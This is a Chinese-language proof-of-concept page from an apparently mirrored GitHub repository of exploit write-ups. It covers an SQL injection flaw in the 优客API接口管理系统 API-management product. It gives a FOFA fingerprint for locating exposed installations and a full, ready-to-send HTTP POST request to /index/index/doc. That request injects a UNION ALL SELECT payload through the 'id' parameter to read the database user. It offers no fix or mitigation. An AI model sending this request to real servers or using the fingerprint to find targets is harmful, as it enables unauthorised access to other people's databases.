admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 02:46:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/优客API接口管理系统/优客API接口管理系统存在SQL注入漏洞.md

36 lines
1.4 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 优客API接口管理系统存在SQL注入漏洞
# 一、漏洞简介
优客API接口管理系统内置30+API接口支持服务器信息网站ICP备案抖音无水印QQ在线状态QQ头像获取历史上的今天IP签名档ICO站标获随机动漫图网站标题获取爱站权重获取城市天气获取随机一言皮皮虾无水印每日Bing壁纸垃圾分类查询手机号归属地申通快递查询等接口功能。优客API接口管理系统存在SQL注入漏洞
# 二、影响版本
+ 优客API接口管理系统
# 三、资产测绘
+ fofa
```plain
"public/static/index/css/flaghome.css"
```
+ 特征
![1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab.png](./img/TRHl7koVp2Qt2mXm/1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab-780835.png)
# 四、漏洞复现
```plain
POST /index/index/doc HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
id=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),NULL-- -
```
![1731383899209-0422239d-a29b-46dd-8538-6b6be399667b.png](./img/TRHl7koVp2Qt2mXm/1731383899209-0422239d-a29b-46dd-8538-6b6be399667b-371311.png)
> 更新: 2024-11-27 10:00:07
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xphkgwr0lgod5047>
Reference in New Issue Copy Permalink